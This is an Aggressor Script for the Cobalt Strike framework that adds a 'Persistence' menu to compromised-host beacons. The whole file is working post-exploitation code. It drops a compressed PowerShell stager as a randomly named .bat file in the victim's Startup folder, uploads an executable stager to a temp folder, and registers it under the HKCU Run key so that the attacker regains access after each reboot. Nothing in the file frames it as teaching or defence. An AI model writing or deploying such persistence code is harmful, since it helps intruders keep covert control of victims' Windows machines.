popup beacon_bottom
{
    menu "Persistence"
    {
        menu "Userland"
        {
            item "Startup Folder"
            {
                startup_folder($1);
            }
            item "HKCU Autorun"
            {
                hkcu_persistence($1);
            }
        }
    }
}

sub startup_folder
{
    $bid = $1;
    
    openPayloadHelper(lambda({

        blog2($bid, "Tasked Beacon to install Startup Persistence using " . listener_describe($1));

        $username = binfo($bid[0], "user");
        $artifact = artifact_stager($1, "powershell", "x64");
        $comp = powershell_compress($artifact);
        $cmd = powershell_command($comp, false);
        $filename = get_random_filename();
        
        bupload_raw!($bid, "C:\\Users\\ $+ $username $+ \\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ $+ $filename $+ .bat", $cmd);

    }));
}

sub hkcu_persistence
{
    $bid = $1;

    openPayloadHelper(lambda({

        blog2($bid, "Tasked Beacon to install HKCU Persistence using " . listener_describe($1));

        $username = binfo($bid[0], "user");
        $artifact = artifact_stager($1, "exe", "x64");
        $filename = get_random_filename();

        bupload_raw!($bid, "C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .exe", $artifact);

        $regname = get_random_filename();

        bpowershell!($bid, "New-ItemProperty -Path HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -Name \" $+ $regname $+ \" -PropertyType ExpandString -Value \"C:\\Users\\ $+ $username $+ \\AppData\\Local\\Temp\\ $+ $filename $+ .exe\" -Force");

    }));
}

sub get_random_filename
{
    @chars = @("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
    @result = @();

    for ($length = 8; $length > 0; $length--)
    {
        add(@result, rand(@chars), 0);
    }

    return join("", @result);
}